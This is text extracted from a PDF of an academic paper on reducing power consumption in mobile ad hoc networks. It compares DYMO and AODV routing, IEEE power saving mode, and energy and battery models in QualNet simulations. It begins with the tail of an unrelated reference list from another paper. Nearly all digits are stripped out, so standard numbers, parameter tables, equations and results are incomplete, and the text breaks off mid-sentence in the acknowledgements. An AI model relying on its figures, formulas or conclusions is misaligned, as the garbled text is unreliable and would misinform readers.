http://ctan.org/tex-archive/macros/generic/diagrams/xypic/doc/xyguide.pdf http://ctan.org/tex-archive/macros/generic/diagrams/xypic/doc/xyguide.pdf http://lcapy.elec.canterbury.ac.nz/ http://dx.doi.org/ . /peerj-cs. the mathics developers. . mathics, a free, general-purpose online computer algebra system featuring mathematica-compatible syntax and functions. available at https://mathics.github.io/ . the quameon developers. . quameon, quantum monte carlo in python. available at http://quameon.sourceforge.net/ . the sage developers. . sagemath, the sage mathematics software system. available at http://www.sagemath.org. the symbolic package developers. . 
the symbolic package for gnu octave. available at http://octave.sourceforge.net/symbolic. the sympy developers. a. symengine, a fast symbolic manipulation library, written in c++. available at https://github.com/symengine/symengine. the sympy developers. b. sympy gamma. available at http://www.sympygamma. com/ . the sympy.jl developers. . sympy.jl, a package to bring python’s sympy function- ality into julia via pycall. available at https://github.com/juliapy/sympy.jl. toth vt. . maple and meijer’s g-function: a numerical instability and a cure. available at http://www.vttoth.com/cms/index.php/technical-notes/ . turk mj, smith bd, oishi js, skory s, skillman sw, abel t, norman ml. . yt: a multi-code analysis toolkit for astrophysical simulation data. the astrophysical journal supplement series : doi . / - / / / . zare r. . angular momentum: understanding spatial aspects in chemistry and physics. hoboken: wiley. zienkiewicz o, taylor r, zhu j. . the finite element method: its basis and funda- mentals. seventh edition. oxford: butterworth-heinemann. meurer et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://mathics.github.io/ http://quameon.sourceforge.net/ http://www.sagemath.org http://octave.sourceforge.net/symbolic https://github.com/symengine/symengine http://www.sympygamma.com/ http://www.sympygamma.com/ https://github.com/juliapy/sympy.jl http://www.vttoth.com/cms/index.php/technical-notes/ http://dx.doi.org/ . / - / / / http://dx.doi.org/ . /peerj-cs. submitted june accepted september published november corresponding authors lubna naaz fatima, lubnanaaz @gmail.com fahmina taranum, ftaranum@yahoo.com, ftaranum@mjcollege.ac.in academic editor daniele d’agostino additional information and declarations can be found on page doi . /peerj-cs. copyright fatima et al. distributed under creative commons cc-by . open access efficient strategies to reduce power consumption in manets lubna naaz fatima*, syeda hajra mahin and fahmina taranum* computer science and engineering, muffakham jah college of engineering and technology, hyderabad, telangana, india * these authors contributed equally to this work. abstract in current circumstances, where amelioration in technology is elevating, power optimization is of grave concern, whilst perceiving portable conditions. the focus is to design an efficient system with an aim to reduce power consumption and improve performance of other metrics. heterogeneous wireless systems will command in the next-generation wireless networks with the aggregation of different remote access mechanisms. a node in manet (mobile adhoc networks) while consuming significant amount of energy practices data transmission and data retrieval process whilst bonding with other neighboring nodes that are within its range. the proposed work implements user specified energy model and dymo (dynamic manet on- demand) routing protocol. further, additional features of ieee . i.e., power saving mode is employed. to obtain enhanced coverage at targeted areas, multi-hop relay strategy is taken into account, also to achieve a less power consuming network with a greater service life. consequently, the efficiency of the devices is monitored by opting residual life accurate battery model, by using different datasets of duracell aa and aaa batteries. simultaneously, battery model, energy model and dymo (dynamic manet on-demand) are applied for ieee . to get a comparative assessment of power consumption between ieee . and ieee . . 
results are generated for both the architectures i.e., . and . for metrics such as residual amount of energy for varying simulation time for all the nodes and for energy consumption in aodv (ad hoc on-demand distance vector) and dymo (dynamic manet on- demand) routing protocol using qualnet version . . subjects computer networks and communications, mobile and ubiquitous computing keywords dymo, aodv, ieee . , ieee . , dcf, ps, dtim introduction networking is a realm with brisk improvement in diverged categories, in which a category that requires immense importance is constrained battery life, which is a grave concern for the users and researchers. constraining the utilization of battery, in union with enhancing its system execution and features in the battery exploitation, while upgrading the system execution and enhancing the features in the mobile station (ms), is a considerable challenge. since a wireless device functioning is based on battery, the issues regarding conservation of energy has to be considered and the constrained battery charge will force the node to route just a limited number of bits. the maximum numbers of bits that can how to cite this article fatima ln, mahin sh, taranum f. . efficient strategies to reduce power consumption in manets. peerj comput. sci. :e http://doi.org/ . /peerj-cs. https://peerj.com/computer-science mailto:lubnanaaz @gmail.com mailto:ftaranum@yahoo.com mailto:ftaranum@mjcollege.ac.in https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://doi.org/ . /peerj-cs. be delivered are considered by dividing the total energy with energy utilized per bit. hence power conserving techniques that alleviate the battery life is needed. major issues with ad-hoc mode is the constrained battery and restricted data transmission bandwidth. thereupon, the considerate part of the ad-hoc systems has the algorithm centric implementation along with deduction for energy depleted per bit during transmission based on transmission strategies to deduce overhead control and alleviate the performance of bandwidth consumption. dymo routing protocol the dynamic manet on demand (dymo) routing protocol inherits some of the characteristics of ad hoc on-demand distance vector (aodv) routing protocol. captivating and unveiling a significant number of its benefits, it is simpler to execute and is outlined bearing future advancements in mind. dymo functions as a reactive routing protocol, i.e., paths to the destination can be retrieved specifically when demanded. dymo performs two main operations: ( ) route discovery and ( ) route maintenance. route discovery is done with help of rreq (route request) and rrep (route reply) messages whereas route maintenance is done using rerr (route error) message (didawiki, ). the route request (rreq) messages are aired by the source node (anuj, sadawarti & anil, ). each rreq maintains a report that captures the data of the nodes which it has gone through. the report hold details about every node and the process the nodes follow while it receives an rreq message, and an instant evaluation is computed to route back to the original point of message. at the moment where an rreq message catches up with its goal node, a route reply (rrep) (anuj, sadawarti & anil, ) message will be delivered back to the starting point, which gives a confirmation that a route to the goal node was found. 
on its way back to the source, an rrep message can conveniently trace back the path on which the rreq message was forwarded along with nodes it went through, to record two-sided path information, back to where it was originated from. the benefits of dymo (dynamic manet on demand) over aodv (ad hoc on- demand distance vector) are • if intermediate node has already an entry for destination in its routing table, it replies with route reply (rrep) message to source in response to route request (rreq) message • life time of a route is extended upon successful forwarding of a packet via that route. • when a route to a destination is lost then a route error (rerr) message is sent towards the source node and also rerr is multi casted to other nodes that were associated to unreachable node. upon receiving message, the source node deletes the route from its routing table. if the source node has another packet to forward for the same destination node, it will again initiate a route discovery process. • the routing table of dymo is comparatively less memory consuming than aodv • the overhead for the protocol decreases with increased network sizes and high mobility, and energy efficiency increases. fatima et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. ieee . ieee . was envisaged for a broad-range high-transmission remote access, also known as wireless metropolitan area network (wireless man) or worldwide interoperability for microwave access (wimax). the data transmission rate can reach up to mbps and signal spectrum can go as much as -kilometres ( miles) (thontadharya et al., ). ieee . e provides mobility support to ieee . . ieee . it is commercially known as the wireless local area network (wlan). typically, two distinct structures, bss (basic service set or infrastructure mode) and ibss (independent basic service set) or ad-hoc mode has been characterized by ieee . . in a bss, mobile stations (stas) are connected to an ap (access point) which is accountable for administering all the interactions that take place among the stations. stations then reach to one and another in a straightforward fashion. in ieee . , the power saving mode (psm) is stationed on deducing the power utilization of the mobile device to point that lacks activity. qualnet, ieee . mac features two diverse access components (moustafa, vasan & raymond, ), the obligatory dcf (distributed co-ordination function), and the optional pcf (point co-ordination function). distributed coordination function (dcf) distributed coordination function (dcf) provides distributed channel access hinging on csma/ca (carrier sense multiple access with collision avoidance) (moustafa, vasan & raymond, ; comlab, ). in dcf, a station observes the channel’s state for a difs (dcf inter frame space) period prior to accessing the wireless medium, in order to forward the data. in a rare event the wireless medium is discovered busy amid the difs interim, the station will then delay its transmission. in the network where various stations struggle to achieve the remote medium, if numerous stations sense the channel to be occupied, they delay their progress. and when it is discovered that the channel is released then an attempt to capture the channel is made by the stations in urge to perform the data forwarding operation, which leads to collision. 
to prevent such effects dcf additionally specifies random back-off time, which forces a station to delay its attempt to access the wireless medium for an additional period. if the medium for difs length is found to be idle, then an authorized access to the medium can be gained and the transmission will commence for the data. difs span can be determined by the following equation, dcf inter-frame space (difs) = short inter-frame space (sifs)+ ( * slot time) short inter-frame space (sifs) is the measure of time in microseconds required for a remote interface to process a received frame and to react with a response frame (tripathy, ; moustafa, vasan & raymond, ; comlab, ). network allocation vector ieee . provides network allocation vector (nav) (comlab, ) that is utilized inside dcf/pcf which is intended to supervise the access to wireless medium by the stations, so that contention generated by the stations can be prevented. each station in the fatima et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. system holds a nav indicator, which notifies the station about the status of the wireless medium. if nav is set as bit ’ ’, the transmission won’t be initiated by the station, despite the fact that the medium is relieved from traffic. power saving mode the ieee . standard adopted the power save mode (psm) (chen, xie & wang, ) / ps mode to reduce energy utilization at stations (sta’s). as indicated by the ieee . standard during the ps mode, a node remains in either of the two states, i.e., in active state, or sleep state. in the active state, the node performs information exchange. in the sleep state, on the differentiation, the station is turned off and thus, it cannot detect the network operations. the remote interface is in alert state for most of the listening period, and power utilization in this state is a bit excess when compared to the rest state. in rest mode, the access point (ap) stocks up the approaching frames, destined for a particular mobile station in psm and intermittently declares its buffering status through the traffic indication map (tim) (tripathy, ) which is encapsulated in the beacon frames and this information is forwarded to all the nodes in psm by means of a unicast, broadcast, or a multicast. beacon frame (chen, xie & wang, ), a management frame in ieee . , is aired out by the controller, which carries thorough information about the network. they are transmitted intermittently by the access point and serve to synchronize the transmission of the data among the nodes. the mobile station in psm will awake periodically to listen to the beacon frames. when the in partial virtual bitmap field of tim matches to its association id (aid), the mobile station sends a ps-poll frame (comlab, ) to the ap to fetch the data and the ap acknowledges to each poll with a buffered frame. numerous exchanges of ps-polls occur between mobile stations and ap, until every single frame has been redeemed by the mobile station. in the broadcast or multicast case, the presence of buffered frames at access point is revealed by setting bit map control and partial virtual bitmap field in the tim (traffic indication map), dtim (delivery traffic indication map) is a unique tim conveyed at a fixed number of beacon interims (tripathy, ). the access point wakes up the mobile stations for it to collect the data cached for it. the less the value of dtim period is, the more consistently a node wakes up and the more battery it utilizes. 
by parameterizing, a low dtim and beacon interval help the nodes to be conscious and serve for a longer period of time. rather than the ordinary continuous active mode (cam), a remote station in psm can frequently put off its system interface to preserve energy when it has no further data buffered at the ap. figure demonstrates the overall mechanism of power saving mode and also gives a review on how dtim work in intervals. fatima et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure power saving mode. the overall mechanism of power saving mode considering two mobile stations and an access point. full-size doi: . /peerjcs. /fig- energy model a radio energy model evaluates the energy consumed in the hardware, specifically during the state that has been exhibited by the devices which can be transmit, receive, idle, and sleep mode. qualnet supports four kinds of radio energy models, • generic • mica-motes • mica z, and • user defined energy consumption of the nodes the energy model presented by the qualnet simulator gives the measure of energy absorbed by the nodes in different modes. a node in a network exhibit mostly four states, a) transmit mode: the device dispatches the data to the destination or intermittent node b) receive mode: the node retrieves the data from the source node or intermittent node c) idle mode: there is no active session for the node when present in an idle state but the node tends to continuously hear the signals within its range from its neighboring nodes, in the event that neighboring nodes have data for the intended node, so as to establish a connection d) sleep mode: sleep mode enables the station to rest itself down for a while. however, in sleep mode, the ms stays associated with the base station. in this way, in sleep mode, the bs holds all the data that is associated with the node in the sleep mode, as it does amid connected mode. fatima et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. formulae’s used to calculate the energy consumed in particular mode etrans (energy consumed in transmit mode) = (transmitting current *volt) * time erecv (energy consumed in receive mode) = (receiving current *volt) * time eidle (energy consumed in idle mode) = (idle current *volt) * time esleep (energy consumed in sleep mode) = (sleep current *volt) * time formulae’s used to calculate the total energy consumption for a particular station power consumption at base station = etrans+erecv+eidle+esleep power consumption at relay station = etrans+erecv+eidle+esleep power consumption at mobile station = etrans+erecv+eidle+esleep battery model the battery is basically a storehouse of electrical charge which gets refilled on recharging and empties itself when being absorbed. along these lines, the functioning of the peripherals, for example, cpu, dc-dc converter, sensors, memory blocks, and so forth, appended to the battery are constrained due to limited battery charge. a dc-dc converter goes about as a voltage controller for different parts. with the assistance of battery models provided by the qualnet, the system productivity and the functioning of the nodes can be contemplated under various circumstances. different battery models include (thontadharya et al., ) electro-chemical models, electrical-circuit models, analytical models, kinetic battery models, and stochastic models. each one of them has certain points of interest and flaws. 
in analytical models, peukert’s law is employed to evaluate the battery lifetime. in addition to peukert’s law, analytical model makes use of fick’s law and faraday’s law to enhance the estimation of a battery lifetime that focused around one-dimensional diffusion. thus, energy utilization of wireless devices plays a major role and can be fused with the battery models offered by qualnet simulator. some of the battery models supported by qualnet simulator are: • precise service life estimator—an exact evaluation of the span of a remote device that utilizes battery under predefined circumstances is estimated through the use of precise service life estimator battery model utilizing rakhmatov’s analytical model. batteries, for example, duracell, aa, aaa, and itsy are employed for this battery model. • precise residual life estimator—precise residual life estimator model measures the battery’s residual charge while circuit absorbs charge from the battery. one of the primary highlights of the battery is that, when the battery disperses the energy to the peripherals, a bit of charge is wasted. • linear model—linear model utilizes the coulomb counting method, which calculates the absorbed coulombs and by comparing the disseminated coulombs and a pre-recorded battery capacity gives the service life of the battery. related work shrimoy tripathy scrutinized the performance of ieee . power saving mode (tripathy, ) and acknowledged that certain incapabilities are observed such as, a beacon frame or a traded atim frames, they stay in dynamic mode, irrespective of whether there are any frames to be forwarded to the destination node. this increases the power utilization fatima et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. of the system. bearing in mind to scale down the power consumption ‘probabilistic energy efficient routing’ convention (peer) was designed by mansi rajgor, prasanna shete, r. n. awale. while dealing with route handling in this routing protocol, the node checks its own residual battery charge, in view of which, it advances the packets with some probability associated to it. this probability depends on the level of the remaining of the battery level of the node. in this way, a route is discovered by nodes with high energy and thus an attempt is made to save the power and shield the system from early exhaustion. later, when an increase in mobility of nodes caused high power reduction in nodes then nand, astya & ali ( ) concentrated on mobility models that depict the action of the portable device. furthermore, the location, speed, and acceleration that change after some time, were observed. mobility models can be of numerous sorts, some of which are file based mobility model, group based mobility model, pedestrian mobility model, and random waypoint mobility model. kandari & pandey ( ) evaluated the energy consumption of aodv, dsr, and dymo routing protocol by employing micaz energy model. at the end of evaluation, the outcomes were analyzed, and the examination report demonstrated that the energy consumed out of idle mode is high when compared to transmit and receive mode. likewise, it has been noticed that dymo gives the highest throughput, which is then joined by dsr and aodv. simultaneously, an energy efficient routing protocol (eerp) was proposed by bhatt, jain & upadhyay ( ). amid the course route discovery and reply process, the distance isolating two successive nodes is registered depending on rss (received signal strength). 
it pursues the standard ‘‘if the nodes are adjacent to one another, rss is high’’, if rss is high than threshold value then the node will consider forwarding the packet via that route. jain ( ) provides the comparative assessment of battery usages with the existing system reports under portable situations. apart from that, the heterogeneous system topology gives its points of interest over existing systems. the batteries, for example, aa and aaa are utilized in service life estimator mode and this model has been viewed as the battery model which gives data on remaining battery in a node after a particular simulation time. energy models for the bs (base station), rs, (relay station) and ms (mobile station) are considered, for which the qualnet simulator give the energy utilization of the node. swain et al. ( ) focused on discrete time markov chain model that functions for the delivery of announcement traffic indication map (atim) and data frames in ieee . dcf power save mode, and further introduces analytical models and power utilization of the ieee . dcf in psm. the observation of the impact of the span of beacon interval on the network execution confirms the requirement for a dynamic beacon window based power saving mechanism to increase the network lifetime without deteriorating the network performance. moustafa, vasan & raymond ( ) informed that, in dcf, the wait state ensures independence from deadlocks, as one station could conceivably be starved and due to the synchronous task between the ap and the stations, pcf deadlock freedom is achieved. anuj, sadawarti & anil ( ) performed operations on dynamic manet on-demand (dymo) routing protocol and investigated its execution depending on different simulation parameters. the simulation has been performed with variable pause times and concluded that dynamic manet on-demand (dymo)’s performance is better in every aspect when compared to existent routing fatima et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. protocols. saranya & ravi ( ) proposed number of strategies like power saving by varying transmission power, power saving by utilizing power-aware routing protocol, and power saving by employing power management techniques, which also gives a superior view on which strategy can be utilized relying upon the situation. the techniques studied can be utilized on scenarios such as, distance between two nodes, its delay tolerance, data traffic rate, and critical utilization of battery. furthermore, it proposes that utilizing an appropriate algorithm which not just improves the survival time of the system but also makes the communication increasingly effective. sangwan & pooja ( ) mentioned about different approaches to preserve power for the efficient working of the network with the goal that ‘it can stay in functioning mode to the extent that it would be possible’. some of them are energy effective routing protocol, minimum battery cost routing, bee ad hoc, sleep impact, mobility model, power conservation in node, heterogeneous and homogeneous system. lubna naaz fatima, fahmina taranum, syeda hajra mahin gave detailed analysis of different types of routing algorithm in fatima, mahin & taranum ( ) and a survey on different strategies that can be used for efficient power consumption and reduction in power consumption to enhance the network lifespan. whereas in taranum, khaleel ur & muhammed ( ) gave a comparison between the ieee standards . and . 
in terms of power consumption among the mobile nodes, relay node and base station. this paper made use of energy models and battery models. further, the authors implemented the code-division multiple access (cdma) to increase the signal range between the relay node and the base node. materials & methods the proposed architecture can be mainly categorized into two, ) network architecture without relay node ) network architecture with a relay node network topology without relay node: in this segment, network topology is modeled using the qualnet simulator. the structure of the framework is given in fig. . the arrangement contains one base station i.e., node and is responsible for forwarding the data to the respective destined nodes, three mobile stations i.e., node , and that travel along the trajectory represented with red flags, a subnet, cbr (traffic generator) and point to point link (blue dashed line). node is linked with mobile nodes using a subnet. network topology with single relay node: up until now it is very clear that multi-hop relay systems can find it as being an increasingly productive procedure to enhance the present state affairs. presently, pondering upon an exceedingly portable condition, this paper takes into account the single hop architecture for the network. figure portrays the model that has been created with the assistance of the qualnet simulator. the arrangement contains one base station, i.e., node , one relay station i.e., node , three mobile stations i.e., node , and , two subnets, cbr (traffic generator) and point to point link (blue dashed line). the relay node acts as a caching node, likewise responsible for communication between the source and destination nodes in the framework. node acts as a relay node/ intermediate node, whenever the source node and the destination node fatima et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure network architecture without relay node. an architecture unveiling three mobile nodes and an access point connected via a point to point link and cbr traffic generator. full-size doi: . /peerjcs. /fig- are beyond reach, multi-hop data transfer can be conducted through intermediate/relay nodes. since the node is adjacent to base node it tends to receive the data from it and forwards it to the mobile nodes. simulation parameters the nodes present in the pair of the architectures can be configured by the means of the parameters specified in table . the energy model parameters specified in table enable the user to assign the energy utilization of the nodes in various power modes (transmit, receive, idle, and sleep). table encompasses the battery model parameters that give an exact evaluation of the life of a device that put to use battery under predefined circumstances. the parameters specified in table aims to enable the power saving mode for an access point, whereas the parameters specified in table intends to enable the power saving mode for a mobile station. figure indicates the flow of power saving mode. scenarios results for more than one scenario is generated i.e., results are provided for not only the amount of power saved but also to obtain a power efficient routing protocol. case ) comparison between routing protocols based on power consumption comparison of energy consumption of nodes using ad hoc on-demand distance vector (aodv) and dynamic manet on-demand (dymo) routing protocol is given for architecture with relay node using ieee . 
for seconds of simulation time, to obtain fatima et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure network architecture with a relay node. an architecture unveiling three mobile nodes, an ac- cess point and a relay node connected via a point to point link and cbr traffic generator. full-size doi: . /peerjcs. /fig- table node configuration parameters. parameters for basic configuration of mobile nodes, relay node and access point. parameters values mobility model file-based network protocol ipv routing protocol dymo radio type . / . mac protocol . b/ . ip input queue size , bytes promiscuous mode enabled antenna model omnidirectional path loss model two ray fading model ricean maximum velocity m/s a power efficient routing protocol. case also made use of energy model, battery models and csma/ca (carrier sense multiple access/collision avoidance). case ) energy consumption of nodes using power saving mode case made use of both the architectures i.e., with and without multi hop relay strategy to give a comparative assessment of power consumption between the architectures, also fatima et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. table energy model parameters. parameters to enable user-specified energy model in mobile node, re- lay node and an access point. parameters value energy model user-defined transmission current load mamp reception load mamp idle current load mamp sleep current load mamp supply voltage of interface . v table battery model parameters. parameters to enable battery model in mobile node, relay node and an access point. parameters value battery model service life estimator battery charge monitoring interval s battery type ms- duracell aaa, rn-duracell aa, bs-duracell aa table power saving mode at mobile node. parameters to enable power save mode in the mobile node and relay node. parameter value power saving mode enabled station scan type passive dtim period listen interval utilizing . power saving mode, energy model, battery model and dynamic manet on-demand (dymo) routing protocol. case ) energy consumption of nodes for . case made use of both the architectures i.e., with and without multi hop relay strategy to give a comparative assessment of power consumption between the architectures, also utilizing energy model, battery model and dynamic manet on-demand (dymo) routing protocol. case ) comparison of . , . e and . power saving mode case generated results for . , . e (mobility model) and . power saving mode for metrics such as end to end delay and jitter to monitor the quality of service. case also utilized energy models, battery model and dynamic manet on-demand (dymo) routing protocol for architecture with relay node. algorithm for power saving mode of a mobile station step : configure the . power saving mode parameters on the node enter the power saving mode by setting the mngmt psw bit as set the listening interval (units = time) and send the association request to access point fatima et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table power saving mode at an access point. parameters to enable power save mode in an access point. 
parameter value station type access point power saving mode enabled beacon-interval beacon-stationrt-time dtim-period step : enter the sleep state step : during listening interval, node wakes up step : listen to the beacon nodes if (the beacon nodes contains the association id of the station and bitmap control= ). then send ps-poll to access point to retrieve the data go to step else go to step step : send acknowledgement frames to access point after receiving the data step : go to step algorithm to calculate the power consumption step : initialize the variables: duration, actual duration = , pxi (energy consumed by current mode) = , now=getnodetime (); step : generate values for the above variables of a node at a particular instance actual duration = (now-start time)/seconds; if (duration = actduration) then go to step else go to step step : check the state of the battery. if(remaining battery charge! = ) then go to step and calculate the power consumption in current mode and decrement the battery charge. else now = dead time of battery; go to step step : calculate the energy consumed by node energy consumed in transmit mode, et = transmitting current * voltage * time energy consumed in receive mode, er = receiving current * voltage * time energy consumed in idle mode, ei = idle current * voltage * time energy consumed in sleep mode, es = sleep current *voltage * time fatima et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure algorithm for power saving mode. a step-by-step procedure on the working of power saving mode for the mobile nodes. full-size doi: . /peerjcs. /fig- remaining battery charge = total battery charge–energy consumed by current activity (ex) increment the value of energy consumed in x mode. total energy in x (transmit/ receive/ idle/ sleep) mode =ex + pxi pxi = total energy in x mode; step : go to step step : print the output power consumption at mobile station = ptrans + precv + pidle + psleep (all ms) power consumption at base station = ptrans + precv + pidle + psleep (all bs) power consumption at relay station = ptrans + precv + pidle + psleep (all rs). fatima et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure comparison of aodv and dymo. a graphical representation giving a comparison on the working of aodv and dymo routing protocol in terms of energy utilization. full-size doi: . /peerjcs. /fig- results case : comparison between routing protocols based on power consumption the results were established for the architecture that made use of the network topology parameters and energy model parameters. it also utilizes the ieee . standard for aodv and dymo routing protocol for s. execution of aodv and dymo for power utilization is assessed, and a combined graphical representation in fig. is given to clarify the performance of aodv and dymo where n , n , and n are mobile stations, n is the base station and n is the relay station. thus, from this representation it can be derived that dymo consumes less power when compared with aodv. in this way, it is inferred that the usage of dymo is extremely productive regarding energy utilization, thus expanding the service life of the battery. case : energy consumption of nodes using power saving mode the simulations have been carried out by employing user-defined energy model, battery models and dymo routing protocol for . 
standards including power save mode on both the topologies i.e., architecture without relay node and architecture with relay node. user-defined energy model allows the user to specify the amount of energy that can be utilized for each of the above-mentioned modes, such that the power utilization are below fatima et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure average of service of mobile nodes using psm for min. a graphical representation of aver- age residue power for architecture with and without relay node; the green bars represents average service life of the proposed strategy i.e., power saving mode of ieee . , whereas the yellow bars represents average service life of the existing system strategy i.e., simply making use of ieee . for minutes of simulation time. full-size doi: . /peerjcs. /fig- mentioned with the threshold level so as to prevent the network from early exhaustion. on comparing the average of the service life obtained in (jain, ) for , and min and the average of the service life obtained in case scenario for simulation time , and min, it can be estimated that psm proves to be efficient. the comparison for the values generated in (jain, ) and case scenario can be depicted from figs. , and the service life of batteries is assessed utilizing eqs. ( ), ( ) and ( ) and is captured in table . the total residue provided by case scenario for simulation time , and min is . , . , and . dbm where as the total residue provided in (jain, ) for simulation time , and min is . , . and . dbm. case : energy consumption of nodes for . in this section, the simulations are performed using energy model parameters, battery model parameters, ieee . , and dymo routing protocol for , and min on both architectures i.e., architecture with relay node and architecture without relay node. after performing the simulation, the estimations of the average of the residual of battery fatima et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure average of residue power of mobile nodes using psm for min. a graphical representation of average residue power for architecture with and without relay node, the green bars represents average service life of the proposed strategy i.e., power saving mode of ieee . whereas the yellow bars repre- sents average service life of the existing system strategy i.e., simply making use of ieee . for min- utes of simulation time. full-size doi: . /peerjcs. /fig- in mah for every mobile station for case scenario and the average of the residue in (jain, ) are captured, and a comparative assessment is given in fig. for the duration of min, for min in fig. , and for min in fig. . assessments are performed to get the net power saving utilizing the below formulas: x(a) = average energy of mobile stations in architecture without relay node x(b) = average energy of mobile stations in architecture with a relay node x(net)=x(b)−x(a)(mah) to get the power saving in dbm the following conversions take place as shown, (x)mah∗(v )=(y )mwh ( ) (z)mw =ymwh/simulation time (hours) (watt-hour to milliwatt conversion) ( ) power−dbm= . ∗(log(z(mw)/ mw )) ( ) fatima et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure average of residue power of mobile nodes using psm for min. 
a graphical representation of average residue power for architecture with and without relay node, the green bars represents average service life of the proposed strategy i.e., power saving mode of ieee . whereas the yellow bars repre- sents average service life of the existing system strategy i.e., simply making use of ieee . for min- utes of simulation time. full-size doi: . /peerjcs. /fig- table evaluation of net power saving in case scenario. simulation time no hop . (mah) hop . (mah) difference (hop-no hop) y (mah) x(mwh)=v ∗y z =log(x(mw )) pdbm= ∗z , . , . , . , . . . , . , . , . , . . . , . , . , . , . . . the evaluated results for , , and simulation time are captured in table . it can be deduced that the service life obtained for simulation time , and min is . , . and . dbm. it can also be concluded that, since case makes no use of power saving mode, the residual battery charge is very low. hence, psm proves its efficiency. fatima et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure average of residue power of mobile nodes using . for minutes. a graphical represen- tation of average residue power for architecture with and without relay node; the green bars represents av- erage service life of strategy that made use of ieee . , whereas the yellow bars represents existing sys- tem strategy i.e., simply making use of ieee . for minutes of simulation time. full-size doi: . /peerjcs. /fig- case : comparison of . , . e and . power saving mode a comparison is done between . , . e and . power saving mode by considering metrics such as end-to-end delay and average jitter. from fig. it can be concluded that end-to-end delay and average jitter is negligible in . , whereas in . e, it is minimal. though power consumption is less in power saving mode but average jitter and end-to-end delay is high in comparison with . and . discussion in our findings certain approaches are implemented so as to restrict the power utilization among the nodes in the system, which utilizes ieee standards—ieee . and ieee . . distributed coordinated function (dcf) assumes to evade the crash and conflict involved in the wireless medium by utilizing certain parameters. for example, difs, sifs, back off interval time and network allocation vector (nav) among the stations. fatima et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure average of residue power of mobile nodes using . for min. a graphical representa- tion of average residue power for architecture with and without relay node; the green bars represents aver- age service life of strategy that made use of ieee . , whereas the yellow bars represents existing system strategy i.e., simply making use of ieee . for min of simulation time. full-size doi: . /peerjcs. /fig- power-aware routing algorithm such as dymo majorly affects the utilization of energy in the network. energy model assesses the energy consumed by the nodes. additionally, the user defined energy model enables the user to specify the threshold value, so that power utilization can be constrained. battery model gives a summarization of the service time provided by the nodes along with residual charge in the battery for the associated nodes. power saving mode utilizes the beacon frames that act as a cache which stores all information about a station in power saving mode. 
the access point broadcasts the beacon frames that contain the address of the node, the node for which the data is stocked up at the access point. whenever the stations hear a beacon frame containing its address, it will awake and after getting acknowledgement in response to ps-poll frame the station enters the active state. for the above-mentioned theory, simulations were performed by considering different parameters and the outcomes demonstrate that dymo as the proficient power-aware routing protocol. apart from that, a correlation was made between the simulation results presented in jain ( ) and case where power saving mode is administered, it was concluded that power saving mode additionally brings up the considerable power saving fatima et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure average of residue power of mobile nodes using . for min. a graphical representa- tion of average residue power for architecture with and without relay node; the green bars represents aver- age service life of strategy that made use of ieee . , whereas the yellow bars represents existing system strategy i.e., simply making use of ieee . for minutes of simulation time. full-size doi: . /peerjcs. /fig- table evaluation of net power saving in case scenario. simulation time no-hop . hop . current diff (mah) power mwh ( ) log(x(mw)) saving ( )dbm . . . . . . . . . . . . . . . . . . option. case scenarios, on assessment, it is persuaded that case while utilizing . does not provide much residual power when compared to case results, hence, power saving mode proves it efficiency, but the results in case presented that power saving mode only diminishes the power usage but the qos is not achieved. conclusions the proposal aims at reducing power consumption in manet’s by implementing battery model, energy model, dymo routing protocol and power saving mode by using qualnet v . simulator. hence, with the assistance of generated results, an analysis can be made, fatima et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure performance analysis of . e, . and . psm. performance of . e, . and . psm is analysed for metrics such as end-to-end delay and jitter for min of simulation time. full-size doi: . /peerjcs. /fig- which suggests that a considerable amount of energy has been preserved and plays a major role to prolong the service life of the battery of mobile devices. the future extension for this system would be in the class of ngn’s, to adequately save power at the mobile stations and further to improve the qos of the heterogeneous network by reducing its power consumption. consequently, the implementation may include handover process i.e., horizontal handover, vertical handover and reduction of power consumption during the handover process. an exhaustive examination regarding the relay station arrangement and execution is essential prior to this heterogeneous system implementation. acknowledgements we would like to acknowledge and thank our college management for providing 